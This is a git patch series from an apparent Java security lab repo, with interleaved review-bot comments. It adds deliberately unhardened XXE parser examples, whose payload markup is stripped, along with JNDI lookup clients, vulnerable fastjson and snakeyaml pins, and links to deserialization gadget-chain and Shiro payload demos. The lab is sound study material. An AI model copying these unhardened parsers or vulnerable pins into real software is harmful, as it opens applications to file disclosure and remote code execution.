@@ -22,6 +22,7 @@ - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) +- [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) ## Demo代码 @@ -42,6 +43,7 @@ - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) - 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: From 7371e48a2af6eeb518523f5e88ba55238607e182 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 9 Jul 2021 03:29:44 +0800 Subject: [PATCH 31/35] add serialization module --- general/pom.xml | 17 +++++++ .../com/govuln/serialization/Application.java | 47 +++++++++++++++++++ .../com/govuln/serialization/Converter.java | 39 +++++++++++++++ .../com/govuln/serialization/model/Card.java | 12 +++++ .../com/govuln/serialization/model/User.java | 15 ++++++ 5 files changed, 130 insertions(+) create mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/Converter.java create mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java create mode 100644 general/src/main/java/com/govuln/serialization/model/User.java diff --git a/general/pom.xml b/general/pom.xml index 1d58119..97a028b 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -48,6 +48,13 @@ commons-codec 1.15 + + + commons-io + commons-io + 2.10.0 + + 
@@ -96,5 +103,15 @@ + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java new file mode 100644 index 0000000..65c0712 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Application.java @@ -0,0 +1,47 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Hex; +import org.apache.commons.io.IOUtils; +import static java.io.ObjectStreamConstants.*; + +import java.io.*; + +public class Application { + public static void main(String[] args) throws Exception + { + write(); + read(); + } + + public static void write() throws Exception + { + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(new User()); + + String data = Hex.encodeHexString(byteSteam.toByteArray()); + System.out.println(data); + ProcessBuilder builder = new ProcessBuilder( + "java", + "-jar", + "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", + data); + InputStream is = builder.start().getInputStream(); + IOUtils.copy(is, System.out); + } + + public static void read() throws Exception + { + Object[] data = { + STREAM_MAGIC, STREAM_VERSION, + TC_STRING, + "123123", + }; + byte[] bs = Converter.toBytes(data); + System.out.println(Hex.encodeHexString(bs)); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); + Object obj = ois.readObject(); + System.out.println(obj); + } +} diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/general/src/main/java/com/govuln/serialization/Converter.java new file mode 100644 index 0000000..d3b6ed4 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Converter.java 
@@ -0,0 +1,39 @@
+package com.govuln.serialization;
+
+import java.io.ByteArrayOutputStream;
+import java.io.DataOutputStream;
+import java.io.IOException;
+import java.io.ObjectOutputStream;
+
+public class Converter {
+ public static byte[] toBytes(Object[] objs) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ DataOutputStream dos = new DataOutputStream(baos);
+ for (Object obj : objs) {
+ treatObject(dos, obj);
+ }
+ dos.close();
+ return baos.toByteArray();
+ }
+
+ public static void treatObject(DataOutputStream dos, Object obj)
+ throws IOException {
+ if (obj instanceof Byte) {
+ dos.writeByte((Byte) obj);
+ } else if (obj instanceof Short) {
+ dos.writeShort((Short) obj);
+ } else if (obj instanceof Integer) {
+ dos.writeInt((Integer) obj);
+ } else if (obj instanceof Long) {
+ dos.writeLong((Long) obj);
+ } else if (obj instanceof String) {
+ dos.writeUTF((String) obj);
+ } else {
+ ByteArrayOutputStream ba = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(ba);
+ oos.writeObject(obj);
+ oos.close();
+ dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header
+ }
+ }
+}
diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java
new file mode 100644
index 0000000..f73fbfc
--- /dev/null
+++ b/general/src/main/java/com/govuln/serialization/model/Card.java
@@ -0,0 +1,12 @@
+package com.govuln.serialization.model;
+
+import java.io.Serializable;
+
+public class Card implements Serializable {
+ public Integer value;
+
+ public Card()
+ {
+ this.value = 100;
+ }
+}
diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java
new file mode 100644
index 0000000..8707855
--- /dev/null
+++ b/general/src/main/java/com/govuln/serialization/model/User.java
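Review bot: `treatObject` has no branch for `byte[]`, so raw bytes a caller wants spliced into the stream verbatim fall into the final `else` and are written as a serialized array object (`TC_ARRAY`) instead; add `} else if (obj instanceof byte[]) { dos.write((byte[]) obj); }` before the `else`. The `else` branch also needs a caveat: each fragment comes from a fresh `ObjectOutputStream`, so any `TC_REFERENCE` handles inside it are numbered from that stream's own base, and two such fragments in one `toBytes` call both start from the same handle number — fine for self-contained objects, wrong as soon as a fragment is meant to back-reference something written earlier. A comment on the `dos.write(...)` line such as `// fragment handles restart at baseWireHandle; only splice objects that do not reference earlier stream content` would record that limit. Note too that `Boolean`, `Character`, `Float` and `Double` are likewise emitted as boxed objects rather than as primitive fields.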
@@ -0,0 +1,15 @@ +package com.govuln.serialization.model; + +import java.io.Serializable; + +public class User implements Serializable { + protected String name; + protected Card card; + + public User() + { + this.name = "Bob"; + this.card = new Card(); + } + +} From 30881f4796a4278899371269bfdbc49888bfa2b9 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 18 Mar 2022 01:58:36 +0800 Subject: [PATCH 32/35] add a new section --- README.md | 10 +++- general/general.iml | 19 -------- .../com/govuln/serialization/Application.java | 47 ------------------- .../serialization/UserSerialization.java | 24 ++++++++++ .../com/govuln/serialization/model/Card.java | 12 ----- .../com/govuln/serialization/model/User.java | 11 +++-- 6 files changed, 39 insertions(+), 84 deletions(-) delete mode 100644 general/general.iml delete mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/UserSerialization.java delete mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java diff --git a/README.md b/README.md index cc8c809..d6a7031 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,7 @@ - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) - [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) +- [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) ## Demo代码 
@@ -42,8 +43,8 @@ - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: @@ -51,3 +52,8 @@ Shiro反序列化: - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) + +自研反序列化分析工具: + +- zkar: +- 如何使用zkar修复SerialVersionUID不匹配的问题: diff --git a/general/general.iml b/general/general.iml deleted file mode 100644 index 7ee5fc5..0000000 --- a/general/general.iml +++ /dev/null @@ -1,19 +0,0 @@ - - - - - - - - - - - - - - - - - - - \ No newline at end of file 
diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java deleted file mode 100644 index 65c0712..0000000 --- a/general/src/main/java/com/govuln/serialization/Application.java +++ /dev/null @@ -1,47 +0,0 @@ -package com.govuln.serialization; - -import com.govuln.serialization.model.User; -import org.apache.commons.codec.binary.Hex; -import org.apache.commons.io.IOUtils; -import static java.io.ObjectStreamConstants.*; - -import java.io.*; - -public class Application { - public static void main(String[] args) throws Exception - { - write(); - read(); - } - - public static void write() throws Exception - { - ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(byteSteam); - oos.writeObject(new User()); - - String data = Hex.encodeHexString(byteSteam.toByteArray()); - System.out.println(data); - ProcessBuilder builder = new ProcessBuilder( - "java", - "-jar", - "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", - data); - InputStream is = builder.start().getInputStream(); - IOUtils.copy(is, System.out); - } - - public static void read() throws Exception - { - Object[] data = { - STREAM_MAGIC, STREAM_VERSION, - TC_STRING, - "123123", - }; - byte[] bs = Converter.toBytes(data); - System.out.println(Hex.encodeHexString(bs)); - ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); - Object obj = ois.readObject(); - System.out.println(obj); - } -} diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/general/src/main/java/com/govuln/serialization/UserSerialization.java new file mode 100644 index 0000000..d20a7af --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/UserSerialization.java 
@@ -0,0 +1,24 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Base64; + +import java.io.*; + +public class UserSerialization { + public static void main(String[] args) throws Exception + { + write(); + } + + public static void write() throws Exception + { + User user = new User("Bob"); + user.setParent(new User("Josua")); + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(user); + + System.out.println(Base64.encodeBase64String(byteSteam.toByteArray())); + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java deleted file mode 100644 index f73fbfc..0000000 --- a/general/src/main/java/com/govuln/serialization/model/Card.java +++ /dev/null @@ -1,12 +0,0 @@ -package com.govuln.serialization.model; - -import java.io.Serializable; - -public class Card implements Serializable { - public Integer value; - - public Card() - { - this.value = 100; - } -} diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java index 8707855..bda5098 100644 --- a/general/src/main/java/com/govuln/serialization/model/User.java +++ b/general/src/main/java/com/govuln/serialization/model/User.java @@ -4,12 +4,15 @@ public class User implements Serializable { protected String name; - protected Card card; + protected User parent; - public User() + public User(String name) { - this.name = "Bob"; - this.card = new Card(); + this.name = name; } + public void setParent(User parent) + { + this.parent = parent; + } } From 35f83ede0b6ed40204fa699589e43a4b4cf3cae5 Mon Sep 17 00:00:00 2001 
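Review bot: `User` still declares no `serialVersionUID`, so the JVM derives one from the class shape, and this very change (replacing `Card card` with `User parent` and switching to a `User(String)` constructor) alters it — any stream written by the previous version of the class now fails to read with `InvalidClassException`. If that mismatch is the intended input for the zkar "SerialVersionUID" walkthrough the same commit links from the README, say so on the class: `// no serialVersionUID on purpose: demonstrates the UID mismatch repaired with zkar`; otherwise add `private static final long serialVersionUID = 1L;`. The class header is outside the hunk.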
From: phith0n Date: Mon, 12 Aug 2024 16:40:30 +0800 Subject: [PATCH 33/35] added XXE related examples --- general/pom.xml | 6 ++-- .../govuln/xxe/DocumentBuilderExample.java | 18 ++++++++++++ .../java/com/govuln/xxe/SAXParserExample.java | 23 +++++++++++++++ .../java/com/govuln/xxe/XMLReaderExample.java | 22 +++++++++++++++ .../java/com/govuln/xxe/XMLStreamExample.java | 28 +++++++++++++++++++ .../govuln/xxe/XPathExpressionExample.java | 22 +++++++++++++++ 6 files changed, 115 insertions(+), 4 deletions(-) create mode 100644 general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/SAXParserExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLReaderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLStreamExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XPathExpressionExample.java diff --git a/general/pom.xml b/general/pom.xml index 97a028b..29d9524 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.6 - 1.6 + 8 + 8 @@ -54,8 +54,6 @@ commons-io 2.10.0 - - diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java new file mode 100644 index 0000000..3111c38 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java @@ -0,0 +1,18 @@ +package com.govuln.xxe; + +import org.w3c.dom.Document; +import javax.xml.parsers.DocumentBuilder; +import javax.xml.parsers.DocumentBuilderFactory; +import java.io.ByteArrayInputStream; + +public class DocumentBuilderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder(); + Document doc = db.parse(new ByteArrayInputStream(data.getBytes())); + System.out.println(doc.getDocumentElement().getTextContent()); + } +} 
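Review bot: `DocumentBuilderFactory.newInstance()` is used with its defaults, which is what makes this an XXE example, but nothing in the file says the parser is left open on purpose, so anyone copying the snippet inherits the vulnerability. A header comment should state intent and fix together: `// Intentionally vulnerable: the default DocumentBuilderFactory resolves external entities. Harden with dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) (or at least disable external-general-entities and external-parameter-entities) before parsing untrusted XML.` `data.getBytes()` also uses the platform charset; `data.getBytes(StandardCharsets.UTF_8)` makes the bytes handed to the parser platform-independent. The DOCTYPE and element markup of the `data` literal appears to have been stripped in this rendering of the diff, so the literal as shown is not the one that was committed.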
diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/general/src/main/java/com/govuln/xxe/SAXParserExample.java new file mode 100644 index 0000000..46fa054 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/SAXParserExample.java @@ -0,0 +1,23 @@ +package com.govuln.xxe; + +import org.xml.sax.helpers.DefaultHandler; + +import javax.xml.parsers.SAXParser; +import javax.xml.parsers.SAXParserFactory; +import java.io.ByteArrayInputStream; + +public class SAXParserExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); + + parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java new file mode 100644 index 0000000..459a222 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +public class XMLReaderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XMLReader reader = XMLReaderFactory.createXMLReader(); + reader.setContentHandler(new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + reader.parse(new InputSource(data)); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java new file mode 100644 index 0000000..0173a44 --- /dev/null 
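Review bot: `reader.parse(new InputSource(data));` hands the XML text to the `InputSource(String systemId)` constructor, which treats its argument as a URI to open rather than as document content, so this example never parses `data` and should fail before any entity is resolved. The content form is `reader.parse(new InputSource(new StringReader(data)));` with `java.io.StringReader` imported. A header comment that the default `XMLReaderFactory.createXMLReader()` resolves external entities on purpose, and that `reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)` is the hardening, would keep the demo from being copied as-is.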
+++ b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java @@ -0,0 +1,28 @@ +package com.govuln.xxe; + +import javax.xml.stream.XMLInputFactory; +import javax.xml.stream.XMLStreamReader; +import java.io.*; + +public class XMLStreamExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + InputStream input = new ByteArrayInputStream(data.getBytes()); + XMLInputFactory factory = XMLInputFactory.newFactory(); + XMLStreamReader reader = factory.createXMLStreamReader(input); + + while (reader.hasNext()) { + reader.next(); + if (reader.isStartElement()) { + System.out.println("Start: " + reader.getLocalName()); + } else if (reader.isEndElement()) { + System.out.println("End: " + reader.getLocalName()); + } else if (reader.hasText()) { + System.out.println("Data: " + reader.getText().trim()); + } + } + } +} diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java new file mode 100644 index 0000000..9b15047 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import javax.xml.xpath.XPath; +import javax.xml.xpath.XPathExpression; +import javax.xml.xpath.XPathFactory; +import java.io.ByteArrayInputStream; + +public class XPathExpressionExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XPathFactory xPathFactory = XPathFactory.newInstance(); + XPath xpath = xPathFactory.newXPath(); + XPathExpression xPathExpr = xpath.compile("/foo/text()"); + + String result = xPathExpr.evaluate(new InputSource(data)); + System.out.println(result); + } +} From 569ed3eb6e3426ba3617228a0bda16d33e3bf354 Mon Sep 17 00:00:00 2001 
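Review bot: `XMLInputFactory.newFactory()` is used with default properties and the reader is never closed; the StAX hardening belongs in a comment so the example is not copied verbatim: `// Intentionally vulnerable; harden with factory.setProperty(XMLInputFactory.SUPPORT_DTD, false) and factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false)`. Add `reader.close();` after the loop (or a try/finally) to release the parser. Note that `hasText()` is also true for comment and DTD events, so the `"Data: "` branch prints DTD text as well as character data.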
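Review bot: `xPathExpr.evaluate(new InputSource(data))` has the same defect as XMLReaderExample: `InputSource(String)` takes a system identifier, so the XML text is treated as a location to open rather than as content and the expression never runs against it; use `new InputSource(new StringReader(data))`. `XPathExpression.evaluate(InputSource)` builds the DOM with the JDK's default, non-hardened `DocumentBuilderFactory` as I understand the implementation, which is presumably the exposure this example intends to show — a comment should say so, and the safe form is to parse with a hardened builder and pass the resulting `Document` to `evaluate(Object)`.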
From: phith0n Date: Wed, 9 Apr 2025 19:57:08 +0800 Subject: [PATCH 34/35] rename folder name --- {general => jdk8}/bytecodes/Foo.java | 0 {general => jdk8}/bytecodes/Hello.java | 0 .../bytecodes/HelloTemplatesImpl.java | 0 {general => jdk8}/pom.xml | 29 +++++++++++++++++++ .../src/main/java/com/govuln/beans/Cat.java | 0 .../main/java/com/govuln/bytes/HelloBCEL.java | 0 .../com/govuln/bytes/HelloClassLoader.java | 0 .../com/govuln/bytes/HelloDefineClass.java | 0 .../com/govuln/bytes/HelloTemplatesImpl.java | 0 .../java/com/govuln/client/JNDIClient.java | 14 +++++++++ .../java/com/govuln/client/LDAPClient.java | 21 ++++++++++++++ .../java/com/govuln/client/RMIClient.java | 9 ++++++ .../deserialization/CommonsBeanutils1.java | 0 .../deserialization/CommonsCollections1.java | 0 .../CommonsCollections1For4.java | 0 .../deserialization/CommonsCollections2.java | 0 .../CommonsCollections2TemplatesImpl.java | 0 .../deserialization/CommonsCollections3.java | 0 .../CommonsCollections3For4.java | 0 .../deserialization/CommonsCollections6.java | 0 .../CommonsCollections6For4.java | 0 .../CommonsCollections6Multiple.java | 0 .../CommonsCollectionsIntro.java | 0 .../CommonsCollectionsIntro2.java | 0 .../CommonsCollectionsIntro3.java | 0 .../com/govuln/deserialization/JDK7u21.java | 0 .../TemplatesImplDeserialization.java | 0 .../com/govuln/deserialization/URLDNS.java | 0 jdk8/src/main/java/com/govuln/js/Eval.java | 20 +++++++++++++ .../com/govuln/serialization/Converter.java | 0 .../serialization/UserSerialization.java | 0 .../com/govuln/serialization/model/User.java | 0 .../govuln/xxe/DocumentBuilderExample.java | 0 .../java/com/govuln/xxe/SAXParserExample.java | 0 .../java/com/govuln/xxe/XMLReaderExample.java | 0 .../java/com/govuln/xxe/XMLStreamExample.java | 0 .../govuln/xxe/XPathExpressionExample.java | 0 .../src/main/java/evil/EvilTemplatesImpl.java | 0 .../src/main/java/evil/Hello.java | 0 jdk8/src/main/resources/eval.js | 4 +++ 40 files changed, 97 insertions(+) rename 
{general => jdk8}/bytecodes/Foo.java (100%) rename {general => jdk8}/bytecodes/Hello.java (100%) rename {general => jdk8}/bytecodes/HelloTemplatesImpl.java (100%) rename {general => jdk8}/pom.xml (81%) rename {general => jdk8}/src/main/java/com/govuln/beans/Cat.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloBCEL.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloClassLoader.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloDefineClass.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/client/JNDIClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/LDAPClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/RMIClient.java rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java (100%) rename {general => 
jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/JDK7u21.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/URLDNS.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/js/Eval.java rename {general => jdk8}/src/main/java/com/govuln/serialization/Converter.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/UserSerialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/model/User.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/DocumentBuilderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/SAXParserExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLReaderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLStreamExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XPathExpressionExample.java (100%) rename {general => jdk8}/src/main/java/evil/EvilTemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/evil/Hello.java (100%) create mode 100644 jdk8/src/main/resources/eval.js diff --git a/general/bytecodes/Foo.java b/jdk8/bytecodes/Foo.java similarity index 100% rename from general/bytecodes/Foo.java rename to jdk8/bytecodes/Foo.java diff --git a/general/bytecodes/Hello.java b/jdk8/bytecodes/Hello.java similarity index 100% rename from general/bytecodes/Hello.java rename to jdk8/bytecodes/Hello.java diff --git a/general/bytecodes/HelloTemplatesImpl.java b/jdk8/bytecodes/HelloTemplatesImpl.java similarity index 100% rename from general/bytecodes/HelloTemplatesImpl.java rename to jdk8/bytecodes/HelloTemplatesImpl.java 
diff --git a/general/pom.xml b/jdk8/pom.xml similarity index 81% rename from general/pom.xml rename to jdk8/pom.xml index 29d9524..fb1091e 100644 --- a/general/pom.xml +++ b/jdk8/pom.xml @@ -54,6 +54,35 @@ commons-io 2.10.0 + + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + org.yaml + snakeyaml + 1.33 + + + + + com.alibaba + fastjson + 1.2.24 + + + + + org.apache.bcel + bcel + 6.10.0 + + diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/jdk8/src/main/java/com/govuln/beans/Cat.java similarity index 100% rename from general/src/main/java/com/govuln/beans/Cat.java rename to jdk8/src/main/java/com/govuln/beans/Cat.java diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloBCEL.java rename to jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java diff --git a/general/src/main/java/com/govuln/bytes/HelloClassLoader.java b/jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloClassLoader.java rename to jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloDefineClass.java rename to jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java rename to jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java diff --git a/jdk8/src/main/java/com/govuln/client/JNDIClient.java b/jdk8/src/main/java/com/govuln/client/JNDIClient.java new file mode 100644 index 0000000..f045cb4 
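Review bot: The added pins are versions with well-documented deserialization exposure — fastjson 1.2.24 is the release most associated with the 2017 autoType issue, snakeyaml 1.33 still lets a default `new Yaml()` instantiate arbitrary classes from type tags (changed in 2.0), and spring-boot 2.7.x is out of OSS support — which is presumably deliberate for a lab module, but nothing in the POM says so and a dependency scanner will report them as mistakes. Add an XML comment above the group: `<!-- Deliberately vulnerable versions, pinned for the deserialization demos in this module; do not bump without updating the demos. -->`.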
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/JNDIClient.java
@@ -0,0 +1,14 @@
+package com.govuln.client;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.directory.InitialDirContext;
+import javax.naming.ldap.InitialLdapContext;
+import java.util.Hashtable;
+
+public class JNDIClient {
+ public static void main(String[] args) throws Exception {
+ Context initialContext = new InitialContext();
+ initialContext.lookup("ldap://127.0.0.1:389/sample");
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/client/LDAPClient.java b/jdk8/src/main/java/com/govuln/client/LDAPClient.java
new file mode 100644
index 0000000..8f68ba1
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/LDAPClient.java
@@ -0,0 +1,21 @@
+package com.govuln.client;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+import javax.naming.directory.InitialDirContext;
+import java.util.Hashtable;
+
+public class LDAPClient {
+ public static void main(String[] args) throws NamingException {
+ Hashtable env = new Hashtable<>();
+ env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
+ env.put(Context.SECURITY_AUTHENTICATION, "simple");
